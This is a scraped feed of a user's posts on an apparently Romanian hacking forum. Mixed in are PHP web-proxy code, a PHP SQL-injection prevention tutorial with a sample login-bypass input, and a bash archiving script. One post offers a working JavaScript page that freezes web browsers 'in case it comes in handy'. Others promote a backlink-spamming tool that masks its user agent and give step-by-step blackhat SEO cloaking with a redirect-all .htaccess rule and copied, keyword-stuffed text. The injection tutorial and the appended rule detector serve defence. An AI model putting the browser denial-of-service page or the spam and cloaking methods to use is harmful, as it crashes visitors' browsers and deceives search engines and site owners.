$_system['uploads']) { $_data_boundary = '----' . md5(uniqid(rand(), true)); $array = set_post_vars($_POST); foreach ($array as $key => $value) { $_post_body .= "--{$_data_boundary}\r\n"; $_post_body .= "Content-Disposition: form-data; name=\"$key\"\r\n\r\n"; $_post_body .= urldecode($value) . "\r\n"; } $array = set_post_files($_FILES); foreach ($array as $key => $file_info) { $_post_body .= "--{$_data_boundary}\r\n"; $_post_body .= "Content-Disposition: form-data; name=\"$key\"; filename=\"{$file_info['name']}\"\r\n"; $_post_body .= 'Content-Type: ' . (empty($file_info['type']) ? 'application/octet-stream' : $file_info['type']) . 
"\r\n\r\n"; if (is_readable($file_info['tmp_name'])) { $handle = fopen($file_info['tmp_name'], 'rb'); $_post_body .= fread($handle, filesize($file_info['tmp_name'])); fclose($handle); } $_post_body .= "\r\n"; } $_post_body .= "--{$_data_boundary}--\r\n"; $_request_headers .= "Content-Type: multipart/form-data; boundary={$_data_boundary}\r\n"; $_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n"; $_request_headers .= $_post_body; } else { $array = set_post_vars($_POST); foreach ($array as $key => $value) { $_post_body .= !empty($_post_body) ? '&' : ''; $_post_body .= $key . '=' . $value; } $_request_headers .= "Content-Type: application/x-www-form-urlencoded\r\n"; $_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n"; $_request_headers .= $_post_body; $_request_headers .= "\r\n"; } $_post_body = ''; } else { $_request_headers .= "\r\n"; } fwrite($_socket, $_request_headers); $_response_headers = $_response_keys = array(); $line = fgets($_socket, 8192); while (strspn($line, "\r\n") !== strlen($line)) { @list($name, $value) = explode(':', $line, 2); $name = trim($name); $_response_headers[strtolower($name)][] = trim($value); $_response_keys[strtolower($name)] = $name; $line = fgets($_socket, 8192); } sscanf(current($_response_keys), '%s %s', $_http_version, $_response_code); if (isset($_response_headers['content-type'])) { list($_content_type, ) = explode(';', str_replace(' ', '', strtolower($_response_headers['content-type'][0])), 2); } if (isset($_response_headers['content-length'])) { $_content_length = $_response_headers['content-length'][0]; unset($_response_headers['content-length'], $_response_keys['content-length']); } if (isset($_response_headers['content-disposition'])) { $_content_disp = $_response_headers['content-disposition'][0]; unset($_response_headers['content-disposition'], $_response_keys['content-disposition']); } if (isset($_response_headers['set-cookie']) && $_flags['accept_cookies']) { foreach 
($_response_headers['set-cookie'] as $cookie) { $name = $value = $expires = $path = $domain = $secure = $expires_time = ''; preg_match('#^\s*([^,\s]*)\s*=?\s*([^;]*)#', $cookie, $match) && list(, $name, $value) = $match; preg_match('#;\s*expires\s*=\s*([^;]*)#i', $cookie, $match) && list(, $expires) = $match; preg_match('#;\s*path\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $path) = $match; preg_match('#;\s*domain\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $domain) = $match; preg_match('#;\s*(secure\#i', $cookie, $match) && list(, $secure) = $match; $expires_time = empty($expires) ? 0 : intval(@strtotime($expires)); $expires = ($_flags['session_cookies'] && !empty($expires) && time()-$expires_time < 0) ? '' : $expires; $path = empty($path) ? '/' : $path; if (empty($domain)) { $domain = $_url_parts['host']; } else { $domain = '.' . strtolower(str_replace('..', '.', trim($domain, '.'))); if ((!preg_match('#\Q' . $domain . '\E$#i', $_url_parts['host']) && $domain != '.' . $_url_parts['host']) || (substr_count($domain, '.') < 2 && $domain{0} == '.')) { continue; } } if (count($_COOKIE) >= 15 && time()-$expires_time <= 0) { $_set_cookie[] = add_cookie(current($_COOKIE), '', 1); } $_set_cookie[] = add_cookie("COOKIE;$name;$path;$domain", "$value;$secure", $expires_time); } } if (isset($_response_headers['set-cookie'])) { unset($_response_headers['set-cookie'], $_response_keys['set-cookie']); } if (!empty($_set_cookie)) { $_response_keys['set-cookie'] = 'Set-Cookie'; $_response_headers['set-cookie'] = $_set_cookie; } if (isset($_response_headers['p3p']) && preg_match('#policyref\s*=\s*[\'"]?([^\'"\s]*)[\'"]?#i', $_response_headers['p3p'][0], $matches)) { $_response_headers['p3p'][0] = str_replace($matches[0], 'policyref="' . complete_url($matches[1]) . 
'"', $_response_headers['p3p'][0]); } if (isset($_response_headers['refresh']) && preg_match('#([0-9\s]*;\s*URL\s*=)\s*(\S*)#i', $_response_headers['refresh'][0], $matches)) { $_response_headers['refresh'][0] = $matches[1] . complete_url($matches[2]); } if (isset($_response_headers['location'])) { $_response_headers['location'][0] = complete_url($_response_headers['location'][0]); } if (isset($_response_headers['uri'])) { $_response_headers['uri'][0] = complete_url($_response_headers['uri'][0]); } if (isset($_response_headers['content-location'])) { $_response_headers['content-location'][0] = complete_url($_response_headers['content-location'][0]); } if (isset($_response_headers['connection'])) { unset($_response_headers['connection'], $_response_keys['connection']); } if (isset($_response_headers['keep-alive'])) { unset($_response_headers['keep-alive'], $_response_keys['keep-alive']); } if ($_response_code == 401 && isset($_response_headers['www-authenticate']) && preg_match('#basic\s+(?:realm="(.*?)")?#i', $_response_headers['www-authenticate'][0], $matches)) { if (isset($_auth_creds[$matches[1]]) && !$_quit) { $_basic_auth_realm = $matches[1]; $_basic_auth_header = ''; $_retry = $_quit = true; } else { show_report(array('which' => 'index', 'category' => 'auth', 'realm' => $matches[1])); } } } while ($_retry); if (!isset($_proxify[$_content_type])) { @set_time_limit(0); $_response_keys['content-disposition'] = 'Content-Disposition'; $_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . 
'"' : $_content_disp; if ($_content_length !== false) { if ($_config['max_file_size'] != -1 && $_content_length > $_config['max_file_size']) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'file_size')); } $_response_keys['content-length'] = 'Content-Length'; $_response_headers['content-length'][0] = $_content_length; } $_response_headers = array_filter($_response_headers); $_response_keys = array_filter($_response_keys); header(array_shift($_response_keys)); array_shift($_response_headers); foreach ($_response_headers as $name => $array) { foreach ($array as $value) { header($_response_keys[$name] . ': ' . $value, false); } } do { $data = fread($_socket, 8192); echo $data; } while (isset($data{0})); fclose($_socket); exit(0); } do { $data = @fread($_socket, 8192); $_response_body .= $data; } while (isset($data{0})); unset($data); fclose($_socket); if ($_content_type == 'text/css') { $_response_body = proxify_css($_response_body); } else { if ($_flags['strip_title']) { $_response_body = preg_replace('#(<\s*title[^>]*>)(.*?)(<\s*/title[^>]*>)#is', '$1$3', $_response_body); } if ($_flags['remove_scripts']) { $_response_body = preg_replace('#<\s*script[^>]*?>.*?<\s*/\s*script\s*>#si', '', $_response_body); $_response_body = preg_replace("#(\bon[a-z]+)\s*=\s*(?:\"([^\"]*)\"?|'([^']*)'?|([^'\"\s>]*))?#i", '', $_response_body); $_response_body = preg_replace('#<noscript>(.*?)</noscript>#si', "$1", $_response_body); } if (!$_flags['show_images']) { $_response_body = preg_replace('#<(img|image)[^>]*?>#si', '', $_response_body); } $tags = array ( 'a' => array('href'), 'img' => array('src', 'longdesc'), 'image' => array('src', 'longdesc'), 'body' => array('background'), 'base' => array('href'), 'frame' => array('src', 'longdesc'), 'iframe' => array('src', 'longdesc'), 'head' => array('profile'), 'layer' => array('src'), 'input' => array('src', 'usemap'), 'form' => array('action'), 'area' => array('href'), 'link' => 
array('href', 'src', 'urn'), 'meta' => array('content'), 'param' => array('value'), 'applet' => array('codebase', 'code', 'object', 'archive'), 'object' => array('usermap', 'codebase', 'classid', 'archive', 'data'), 'script' => array('src'), 'select' => array('src'), 'hr' => array('src'), 'table' => array('background'), 'tr' => array('background'), 'th' => array('background'), 'td' => array('background'), 'bgsound' => array('src'), 'blockquote' => array('cite'), 'del' => array('cite'), 'embed' => array('src'), 'fig' => array('src', 'imagemap'), 'ilayer' => array('src'), 'ins' => array('cite'), 'note' => array('src'), 'overlay' => array('src', 'imagemap'), 'q' => array('cite'), 'ul' => array('src') ); preg_match_all('#(<\s*style[^>]*>)(.*?)(<\s*/\s*style[^>]*>)#is', $_response_body, $matches, PREG_SET_ORDER); for ($i = 0, $count_i = count($matches); $i < $count_i; ++$i) { $_response_body = str_replace($matches[$i][0], $matches[$i][1]. proxify_css($matches[$i][2]) .$matches[$i][3], $_response_body); } preg_match_all("#<\s*([a-zA-Z\?-]+)([^>]+)>#S", $_response_body, $matches); for ($i = 0, $count_i = count($matches[0]); $i < $count_i; ++$i) { if (!preg_match_all("#([a-zA-Z\-\/]+)\s*(?:=\s*(?:\"([^\">]*)\"?|'([^'>]*)'?|([^'\"\s]*)))?#S", $matches[2][$i], $m, PREG_SET_ORDER)) { continue; } $rebuild = false; $extra_html = $temp = ''; $attrs = array(); for ($j = 0, $count_j = count($m); $j < $count_j; $attrs[strtolower($m[$j][1])] = (isset($m[$j][4]) ? $m[$j][4] : (isset($m[$j][3]) ? $m[$j][3] : (isset($m[$j][2]) ? 
$m[$j][2] : false))), ++$j); if (isset($attrs['style'])) { $rebuild = true; $attrs['style'] = proxify_inline_css($attrs['style']); } $tag = strtolower($matches[1][$i]); if (isset($tags[$tag])) { switch ($tag) { case 'a': if (isset($attrs['href'])) { $rebuild = true; $attrs['href'] = complete_url($attrs['href']); } break; case 'img': if (isset($attrs['src'])) { $rebuild = true; $attrs['src'] = complete_url($attrs['src']); } if (isset($attrs['longdesc'])) { $rebuild = true; $attrs['longdesc'] = complete_url($attrs['longdesc']); } break; case 'form': if (isset($attrs['action'])) { $rebuild = true; if (trim($attrs['action']) === '') { $attrs['action'] = $_url_parts['path']; } if (!isset($attrs['method']) || strtolower(trim($attrs['method'])) === 'get') { $extra_html = '<input type="hidden" name="' . $_config['get_form_name'] . '" value="' . encode_url(complete_url($attrs['action'], false)) . '" />'; $attrs['action'] = ''; break; } $attrs['action'] = complete_url($attrs['action']); } break; case 'base': if (isset($attrs['href'])) { $rebuild = true; url_parse($attrs['href'], $_base); $attrs['href'] = complete_url($attrs['href']); } break; case 'meta': if ($_flags['strip_meta'] && isset($attrs['name'])) { $_response_body = str_replace($matches[0][$i], '', $_response_body); } if (isset($attrs['http-equiv'], $attrs['content']) && preg_match('#\s*refresh\s*#i', $attrs['http-equiv'])) { if (preg_match('#^(\s*[0-9]*\s*;\s*url=)(.*)#i', $attrs['content'], $content)) { $rebuild = true; $attrs['content'] = $content[1] . complete_url(trim($content[2], '"\'')); } } break; case 'head': if (isset($attrs['profile'])) { $rebuild = true; $attrs['profile'] = implode(' ', array_map('complete_url', explode(' ', $attrs['profile']))); } break; case 'applet': if (isset($attrs['codebase'])) { $rebuild = true; $temp = $_base; url_parse(complete_url(rtrim($attrs['codebase'], '/') . 
'/', false), $_base); unset($attrs['codebase']); } if (isset($attrs['code']) && strpos($attrs['code'], '/') !== false) { $rebuild = true; $attrs['code'] = complete_url($attrs['code']); } if (isset($attrs['object'])) { $rebuild = true; $attrs['object'] = complete_url($attrs['object']); } if (isset($attrs['archive'])) { $rebuild = true; $attrs['archive'] = implode(',', array_map('complete_url', preg_split('#\s*,\s*#', $attrs['archive']))); } if (!empty($temp)) { $_base = $temp; } break; case 'object': if (isset($attrs['usemap'])) { $rebuild = true; $attrs['usemap'] = complete_url($attrs['usemap']); } if (isset($attrs['codebase'])) { $rebuild = true; $temp = $_base; url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base); unset($attrs['codebase']); } if (isset($attrs['data'])) { $rebuild = true; $attrs['data'] = complete_url($attrs['data']); } if (isset($attrs['classid']) && !preg_match('#^clsid:#i', $attrs['classid'])) { $rebuild = true; $attrs['classid'] = complete_url($attrs['classid']); } if (isset($attrs['archive'])) { $rebuild = true; $attrs['archive'] = implode(' ', array_map('complete_url', explode(' ', $attrs['archive']))); } if (!empty($temp)) { $_base = $temp; } break; case 'param': if (isset($attrs['valuetype'], $attrs['value']) && strtolower($attrs['valuetype']) == 'ref' && preg_match('#^[\w.+-]+://#', $attrs['value'])) { $rebuild = true; $attrs['value'] = complete_url($attrs['value']); } break; case 'frame': case 'iframe': if (isset($attrs['src'])) { $rebuild = true; $attrs['src'] = complete_url($attrs['src']) . '&nf=1&go=proxyx'; } if (isset($attrs['longdesc'])) { $rebuild = true; $attrs['longdesc'] = complete_url($attrs['longdesc']); } break; default: foreach ($tags[$tag] as $attr) { if (isset($attrs[$attr])) { $rebuild = true; $attrs[$attr] = complete_url($attrs[$attr]); } } break; } } if ($rebuild) { $new_tag = "<$tag"; foreach ($attrs as $name => $value) { $delim = strpos($value, '"') && !strpos($value, "'") ? 
"'" : '"'; $new_tag .= ' ' . $name . ($value !== false ? '=' . $delim . $value . $delim : ''); } $_response_body = str_replace($matches[0][$i], $new_tag . '>' . $extra_html, $_response_body); } } if ($_flags['include_form'] && !isset($_GET['nf'])) { $_url_form = '<div style="width:100%;margin:0;text-align:center;border-bottom:1px solid #725554;color:#000000;background-color:#F2FDF3;font-size:12px;font-weight:bold;font-family:Bitstream Vera Sans,arial,sans-serif;padding:4px;">' . '<form method="post" action="' . $_script_url . '?go=proxyx">' . ' <label for="____' . $_config['url_var_name'] . '"><a href="' . $_url . '">Address</a>:</label> <input id="____' . $_config['url_var_name'] . '" type="text" size="80" name="' . $_config['url_var_name'] . '" value="' . $_url . '" />' . ' <input type="submit" name="go" value="Go" />' . ' [go: <a href="' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_url_parts['prev_dir']) .' ">up one dir</a>, <a href="' . $_script_base . '">main page</a>]' . '<br /><hr />'; foreach ($_flags as $flag_name => $flag_value) { if (!$_frozen_flags[$flag_name]) { $_url_form .= '<label><input type="checkbox" name="' . $_config['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' /> ' . $_labels[$flag_name][0] . '</label> '; } } $_url_form .= '</form></div>'; $_response_body = preg_replace('#\<\s*body(.*?)\>#si', "$0\n$_url_form" , $_response_body, 1); } } $_response_keys['content-disposition'] = 'Content-Disposition'; $_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . 
'"' : $_content_disp; $_response_keys['content-length'] = 'Content-Length'; $_response_headers['content-length'][0] = strlen($_response_body); $_response_headers = array_filter($_response_headers); $_response_keys = array_filter($_response_keys); header(array_shift($_response_keys)); array_shift($_response_headers); foreach ($_response_headers as $name => $array) { foreach ($array as $value) { header($_response_keys[$name] . ': ' . $value, false); } } echo $_response_body; exit(); } /* Nub servers now disable base64, So we'll use URLEncode, they disable that then i'll make my own encryption */
-
Enable Regedit/Cmd/TaskMgr/Run/Folder Options/System Restore Config
Gonzalez replied to ciubyever's topic in Programe utile
Not needed. -Gonzalez -
Parazitii - Avort verbal.mp3 -Gonzalez
-
^^ Well said ) Pure pwnage. -Gonzalez
-
Some topics shouldn't be commented on, because of the idiocy (in the video), but right now I can't help myself and I'll say that the guy really is infected with some virus from Venus or Jupiter - unfortunately there is no antidote for him. -Gonzalez
-
TUTORIAL: Make your Firefox hundreds of times faster!
Gonzalez replied to Krisler12's topic in Tutoriale in romana
^ Super bingo -Gonzalez -
Our level is low compared to other countries in the West; that is what the rebel policeman demonstrated. -Gonzalez
-
Yeah, no complaints. -Gonzalez
-
It’s very important to secure your data in PHP correctly, because if you don’t, your website is at risk of being harmed by SQL injections and other dangerous code injections, which you obviously don’t want. So to protect your website against these code attacks, this tutorial was written. This tutorial will explain the reasons to secure data in PHP and the best ways to easily accomplish this.

Securing data before database interaction

The first ‘type’ of data you should secure is the data you will use to interact with the database. Of course you could just as well use the user-input data to interact with your database table right away, but let’s have a look at what could happen if you do so:

Insecure MySQL select query (BAD):

    $user_input1 = "username_example"; //example of valid user input
    $user_input2 = " ' OR username = 'username_example"; //BAD user input
    $sql = "SELECT id FROM accounts WHERE username = '$user_input1' AND password = '$user_input2' ";

This is an example of an insecure SQL query which could, for example, be used with a login system to check whether the user-input username & password are valid. However, because of its insecurity, users could just fill in some password like ' OR username = 'username_example . What will happen then, you can see from the following:

    $sql = "SELECT id FROM accounts WHERE username = '$user_input1' AND password = '$user_input2' ";

becomes =>

    $sql = "SELECT id FROM accounts WHERE username = 'username_example' AND password = '' OR username = 'username_example' ";

Now, say, ‘username_example’ is a valid username of an account the user knows and wants to log in to without having to supply the password ( hack it ). He just filled in his bad code to make the query still return true, because it now checks whether the username & password are correct OR only the username is correct. Which obviously is the case. So the user has now successfully logged in to the victim’s account.

Of course you don’t want this to happen to your website’s members! So be smart, and secure your data in PHP. However, this was just an example of an insecure login system SQL query. The same thing can happen to any other SQL queries which are set up insecurely, which use user-input data straight away without securing it first. In the above example the coder made at least 2 major security faults:

* Coder used the user-input data straight away in a SQL query
* Coder put the user-input data in the query between single quotes

The first fault was explained above. But besides that, it was also very wrong to put the user-input data between single quotes which, as you could see in the above example of a bad user input, made the user able to easily bypass/get round these quotes and add another part to the query themselves. So the first thing we should do to make this query secure is put it between '". and ."'. So, as a general example:

    $better_query = "SELECT field FROM table WHERE field = '".$_POST['userinput_fieldname']."' ";

But still this isn’t enough. Although it’s already a lot harder now for the user to inject code inside the query, it can still be done. To prevent this totally, we can use the security function made by PHP: mysql_real_escape_string. This function will escape all dangerous contents out of the user-input data, so it can’t do any harm to your SQL query and database and/or website anymore.

Secure and proper select query example (GOOD):

    $better_query = "SELECT field FROM table WHERE field = '".mysql_real_escape_string($_POST['userinput_fieldname'])."' ";

All right, so now at least our query is secured and safe. The same can be done when INSERTING data into the database; however, there’s still one thing that could possibly happen: an error can occur when users use symbols such as ' and " (quotes) in an inappropriate way. To fix this, we can make PHP add slashes before these symbols to escape them. This will make these quotes, for example, be treated as plain text. A function that does this for us is: addslashes.

Secure and proper insert query example (GOOD):

    $secure_and_proper_query = "INSERT INTO table(field) VALUES('".addslashes(mysql_real_escape_string($_POST['userinput_fieldname']))."')";

When doing this you might want to use stripslashes again when retrieving the data, if it happens to show the slashes in the output.

Securing data before database output

It’s also not always safe to output user-input data from the database straight away, especially when you haven’t secured the user-input data. If you DO secure the user-input data to the database as done above, you should be safe, but to be 100% sure the database fields don’t contain any code that will be executed, a function such as htmlspecialchars could be used. This function escapes all possibly harmful tags/symbols out of the data. For example < will become &lt;. Which will only be converted once by the browser into the text symbol < and which won’t be executed as code ( such as < b > normally would make text bold ).

Secure Output Example:

    //example of bad user input from database or input field
    $bad_userinput = "make whole page from here bold! <b> and mess up layout </table> or <table>";
    echo htmlspecialchars($bad_userinput); //hah I won't!

And fixed - your webpage has been prevented from being totally messed up by the user input. Hope you learnt something and don’t forget: always secure user-input data in PHP before using ;-)!
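An added example, not part of the original post: the tutorial's login query built by concatenation beside a prepared-statement version, plus output encoding with htmlspecialchars. It uses PDO with an in-memory SQLite database in place of the mysql_* functions (removed in PHP 7.0); the table layout, the sample account and the function names are assumptions made for the example.

```php
<?php
// Added example with constructed data and hypothetical helper names.
// Assumes the pdo_sqlite extension; the in-memory database stands in for MySQL.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE accounts (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE,
    password_hash TEXT
)');

// Constructed sample account; only a hash of the password is stored.
$insert = $pdo->prepare('INSERT INTO accounts (username, password_hash) VALUES (?, ?)');
$insert->execute(['username_example', password_hash('correct horse', PASSWORD_DEFAULT)]);

/**
 * BEFORE: the query shape from the tutorial, built by string concatenation.
 * The input becomes part of the SQL text, so a quote inside it changes
 * the structure of the WHERE clause.
 */
function login_concatenated(PDO $pdo, string $user, string $pass)
{
    $sql = "SELECT id FROM accounts WHERE username = '$user' AND password_hash = '$pass'";
    return $pdo->query($sql)->fetchColumn(); // matching id, or false when no row matches
}

/**
 * AFTER: the SQL text is fixed. The username is sent as a bound parameter,
 * so it can only ever be compared as a value, and the password is checked
 * in PHP against the stored hash instead of inside the query.
 */
function login_prepared(PDO $pdo, string $user, string $pass)
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM accounts WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return false;
    }
    return (int) $row['id'];
}

/**
 * Output side: encode at the moment the value is written into HTML.
 * ENT_QUOTES also encodes single quotes, which matters inside attributes.
 */
function render_comment(string $stored): string
{
    return '<p>' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8') . '</p>';
}

// The two inputs used in the tutorial.
$user_input1 = 'username_example';
$user_input2 = "' OR username = 'username_example";

// Same inputs through both functions, then the legitimate password.
var_dump(login_concatenated($pdo, $user_input1, $user_input2));
var_dump(login_prepared($pdo, $user_input1, $user_input2));
var_dump(login_prepared($pdo, $user_input1, 'correct horse'));

// The tutorial's "bad" stored value, encoded for display.
echo render_comment('make whole page from here bold! <b> and mess up layout </table> or <table>'), "\n";
```

Each value is escaped once, for the context it is entering: bound parameters for SQL, htmlspecialchars for HTML. Stacking addslashes on top of another SQL escape stores literal backslashes in the data, which is why stripslashes becomes necessary on the way out.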
-
    #!/bin/bash
    #Author: Avek
    #Add all files/folders from folder to different archives
    #Delete files/folders after successfully adding to rar
    #Split to volume set in mb by user - 1st option eg
    #./script 10 = 10mb splits
    #Standard size = 100 mb
    if [ -n "$1" ]; then
        SIZE=$(($1 * 1024))
    else
        SIZE=$((100 * 1024))
    fi
    # Name of this script without the leading "./", so it is not archived itself
    Sname=`echo "$0" | sed 's/.\///g'`;
    for x in *
    do
        if [ "$x" == "$Sname" ]; then
            echo -ne;
        elif [ -d "$x" ] || [ -e "$x" ]; then
            # -df deletes the source after archiving, -m0 stores without compression
            rar a -df -m0 -v"$SIZE"k "$x".rar "$x"
        fi
    done
-
It would be nice in any case. It's hard at the beginning, but it's possible to start. -Gonzalez
-
Simple HTML(JS) Remote Denial of Service example for WebBrowsers
Gonzalez replied to Gonzalez's topic in Exploituri
I didn't write it. But I thought I'd post it, maybe it will come in handy for someone. -Gonzalez -
Works on: SeaMonkey 2.0.2, Firefox 3.6, Internet Explorer 6, 7 and 8, Safari 4.0.4

Just save it as "sometext.html"

    <!--
    SeaMonkey 2.0.2, Firefox 3.6, Internet Explorer 6,7 and 8, Safari 4.0.4 - Simple HTML(JS) Remote Denial of Service Example
    -->
    <body onload="javascript:Kill();"></body>
    <script>
    function Kill() {
        for (i=0;i<1;i++) {
            document.write('<html><marquee><h'+i+'>'+i);
            i--;
        }
    }
    </script>
-
[statBlaster 5.2] Update 17: Improved Help Revision 7: Quality Control Last updated: February 13, 2010 Description StatBlaster is a free utility that logs your site onto statistics/whois websites, generating backlinks along the way. To use StatBlaster: 1. Add or import the addresses of the websites you want to promote into the "Your Domains" list. 2. In the "Statistics Websites" box, enter the location of the file that contains the list of statistics websites you want to blast to. The websites should be separated by line and marked with for the location of your domain. 3. Select the maximum number of connections you want to use. More connections speed up submission, but also use more memory. 4. Click "Start". The download section also includes a list of 2,566 URLs prepared for StatBlaster. Lastest Update Version 5.2 improves the integrated help to show tips when you hover over a portion of the StatBlaster interface. These tips can be turned off through the Help menu. A bug involving loading saved states has been fixed. Revision 7 of urls.txt removes some links that no longer work properly, trimming down the list to 2,566 URLs. Keep in mind that you need to extract the entire .rar archive to replace all 4 of your old StatBlaster files while updating. Version 5.1 and Revision 6 are retired and have been removed. Features StatBlaster quickly and efficiently blasts your domain name to thousands of statistics websites. Statistics websites include websites that valuate your domain, provide whois information for your domain, and most importantly-- drop a backlink to your domain. StatBlaster is packed full of features: * Multithreading: StatBlaster can handle up to 100 connections at once, which means that it can blast up to 100 sites simultaneously. * Automatic Pinging: StatBlaster automatically sends every backlink you generate to Ping-o-Matic, which pings 22 services. 
* Load/Save State: StatBlaster can save your progress into a StatBlaster State (*.sbs), which can be loaded later to resume where you left off. * Smart List Management: StatBlaster automatically sorts and formats websites in your queue, while removing duplicates. * Import Websites: StatBlaster allows you to import a list of your websites to blast. * Stealthy: StatBlaster masks its user agent string and offers proxy support to be indistinguishable from an internet browser. * User Friendly: StatBlaster remembers your settings and also provides help through messages in the status bar. * Fully Client-Sided: StatBlaster doesn't "call back" to any website, and StatBlaster won't stop working if some registration server goes down. You are in total control when you use StatBlaster. * Cross-Platform Compatibility: StatBlaster normally runs on Windows, but can also run on Mac, Linux, and other Unix-like operating systems through Wine. Finally, StatBlaster is available for free, which is hard to beat. 
Download: Statblaster 5.2.rar
Includes: StatBlaster 5.2.exe; AutoHotkey.dll; libcurl.dll; urls.txt (Revision 7)
http://www.mediafire.com/?nxxt1z5ngl2

Changelog

Version 5.2 (2/13/10): Integrated help now shows tooltips
Revision 7 (2/13/10): Quality control
Version 5.1 (2/7/10): Saves settings in configuration file; Faster performance
Revision 6 (2/7/10): Quality control
Version 5.0 (2/6/10): Single-process multithreading; Waits for threads to finish before completing submission; Improved pinging; Proxy test changed to connection test; Maximum threads can no longer be changed when paused
Version 4.2 (2/4/10): Integrated help through status bar; Proxy test; Improved performance
Version 4.1 (2/1/10): Proxy support; Wine Compatibility Mode removed
Revision 5 (1/31/10): Added experimental Alexa sites, courtesy of geteasymoneynow
Version 4.0 (1/30/10): New submission engine; Taskbar alert
Version 3.3 (1/29/10): Improved memory efficiency
Revision 4 (1/29/10): Merged list with new source, courtesy of SebastianJu
Version 3.2 (1/29/10): Improved submission engine; Alert on completion; Ability to disable website submission
Revision 3 (1/29/10): Removed malware-infected sites, courtesy of SebastianJu
Version 3.1 (1/26/10): Customizable user agent; Efficiency fix
Version 3.0 (1/26/10): Automatic pinging submits backlinks to Ping-o-Matic; Properly formats all addresses in "Your Websites"
Version 2.2 (1/24/10): Wine Compatibility Mode adds support for Mac, Linux, and Unix-like systems; Maximum threads increased to 100
Version 2.1 (1/19/10): Loads and saves progress states; Automatically sorts your websites and removes duplicates; Allows adjusting threads while paused; Improved multithreading efficiency; Maximum threads reduced to 99
Revision 2 (1/18/10): Spam and duplicate links removed, courtesy of chowyoungfat
Version 2.0 (1/18/10): Multithreading supports up to 999 threads
Version 1.3 (1/17/10): Statistics website list is no longer restricted to "urls.txt"; Automatically removes "www." prefix from site address; Improved tray tooltip
Version 1.2 (1/16/10): Improved interface; Imports websites from .txt files
Revision 1 (1/10/10): New scrape of http://www.1347.com.cn/ with additional links from antx16
Version 1.1 (11/23/09): Handles multiple sites; Automatically removes "http://" prefix from site address
Revision 0 (11/22/09): Original release
Version 1.0 (11/22/09): Original release

License

The download comes with four files, each under a different license.

* The StatBlaster executable is released under the Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License.
* libcurl.dll is released under a MIT/X derivative license.
* AutoHotkey.dll (source code) is released under the GNU General Public License, Version 2.0.
* urls.txt is released into the public domain.

Contact Sycthos via private message to negotiate commercial licensing of the StatBlaster executable.

VirusTotal
http://www.virustotal.com/analisis/938fe43117c4d10bc4f8153d38ad5255e81c3ea9e18c5d6c85638eea5a27b765-1266081705
-
Author: newkid..

Here are my 2 cents.

For one of my domains, created one and a half months back, I was ranking well for specific searches. Say I have reviewed a product: if you search for that product, I rank on the first page. Fair enough, but that does not bring massive traffic, because I never did reviews based on product popularity. Instead I just review what I find on my way, and that too with no affiliate link and optimized only for adsense (getting 25% CTR).

Let's be more specific. My domain relates to 'Make money online' and 'Work from home', and say I reviewed websites like 'sponsoredreviews', 'payperpost', 'mylot' etc. So if anyone searches for these keywords, I always come up on the first page. I was quite satisfied because it's a month-old blog. But the clicks I was getting were 100/day, which was too dull for me. And for the main keywords like 'Make Money online', 'Work from home', 'Home based business', 'make money guide', I was not ranking in the Top 100 (you know how competitive these keywords are)...

And I did something which made my page come into the Top 50 on the first attempt and the Top 10 on the second attempt. Traffic surged from 100/day to 3400/day on average.

I don't know if I can call it blackhat, but definitely not white. Give it a try for instant results....

What I did:

(1) I modified the .htaccess file. At the bottom, I added

    RewriteEngine On
    RewriteBase /
    RewriteRule ^(.+)$ / [R=302,L]

What it does is forward all the internal pages to the homepage. You type anything www.yourdomain.com/****/****.html and it will come to www.yourdomain.com

(2) Added one plain HTML page in the root directory named 'index.html'

(3) Edited that index.html like this:
a) Title - Your 2 anchor keywords
b) In the body, 2 lines of text filled with your main keyword in an <h1> tag
c) Search your keyword in google, pick any 3 results from the top 10 and copy the first para of each article
d) Make this copied article Bold
e) Add an <h2> tag with your first keyword
f) Go to the keyword tool in adword, type your main keyword and see all the relevant keywords coming up in the results. Note any 10 results (two short keywords, two 3/4 word keywords, six long tail keywords), add these keywords under the <h2> tag defined above and keep them in <h3> tags
g) Now repeat steps (e) and (f) for your second keyword (anchor text)

(4) Ping your blog through pingler and pingthatblog

(5) Leave it for a day

(6) After 24 hours, remove the added lines in the .htaccess file and rename or delete the index.html file added to the root directory
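A check a site owner or auditor could run for the rule quoted in the post above, added here as an example and not part of the original post: it scans .htaccess text for an unconditional RewriteRule that externally redirects every path to one fixed target. The sample file, the probe paths and the function name are constructed for illustration.

```python
import re

# Constructed sample .htaccess (not from a real site); last rule is the one quoted in the post.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteBase /
# benign front-controller rewrite: internal and conditional
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
RewriteRule ^old-page\.html$ /new-page.html [R=301,L]
RewriteRule ^(.+)$ / [R=302,L]
"""

# Constructed probe paths; a pattern matching all of them is treated as catch-all.
PROBE_PATHS = ["about.html", "2010/02/some-post.html", "css/site.css", "x"]

def find_catch_all_redirects(text):
    """Return (line_no, status, rule) for unconditional catch-all external redirects."""
    findings, pending_conds = [], 0
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', line)]
        directive = parts[0].lower()
        if directive == "rewritecond":
            pending_conds += 1  # conditions attach to the next RewriteRule
            continue
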